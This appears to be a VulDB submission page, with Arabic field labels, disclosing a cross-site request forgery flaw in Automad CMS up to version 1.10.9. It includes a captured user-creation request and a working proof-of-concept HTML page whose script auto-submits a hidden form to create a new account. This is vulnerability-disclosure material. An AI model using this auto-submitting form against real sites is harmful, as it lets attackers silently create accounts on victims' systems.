| عنوان | Automad CMS <= 1.10.9 Multiple Cross-Site Request Forgery (CSRF) |
|---|
| الوصف | After observation, it was discovered that the application does not implement CSRF tokens by default, making it vulnerable to CSRF attacks. This impacts the overall functionality of the application. Below is a view of one of the action requests while adding a user:
POST /dashboard?controller=UserCollection::createUser HTTP/1.1
Host: automad.scr
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 76
Origin: http://automad.scr
Connection: close
Referer: http://automad.scr/dashboard?view=System
Cookie: Automad-8d86b702d2bd8d7c568d8600480adaef=feu6beoo6sc7ha2gp2gilsk211
X-PwnFox-Color: green
username=User&email=User%40example.com&password1=Passw0rd&password2=Passw0rd
CSRF HTML:
<html>
<body>
<form action="http://automad.scr/dashboard?controller=UserCollection::createUser" method="POST">
<input type="hidden" name="username" value="User" />
<input type="hidden" name="email" value="User@example.com" />
<input type="hidden" name="password1" value="Passw0rd" />
<input type="hidden" name="password2" value="Passw0rd" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
|
|---|
| المصدر | ⚠️ https://github.com/screetsec/VDD/tree/main/Automad%20CMS/Cross-Site%20Request%20Forgery%20(CSRF) |
|---|
| المستخدم | Maland (UID 59886) |
|---|
| ارسال | 09/12/2023 06:15 PM (3 سنوات منذ) |
|---|
| الاعتدال | 21/12/2023 09:19 AM (12 days later) |
|---|
| الحالة | تمت الموافقة |
|---|
| إدخال VulDB | 248687 [automad حتى 1.10.9 User Creation dashboard?controller=UserCollection::createUser تزوير طلبات عبر المواقع] |
|---|
| النقاط | 20 |
|---|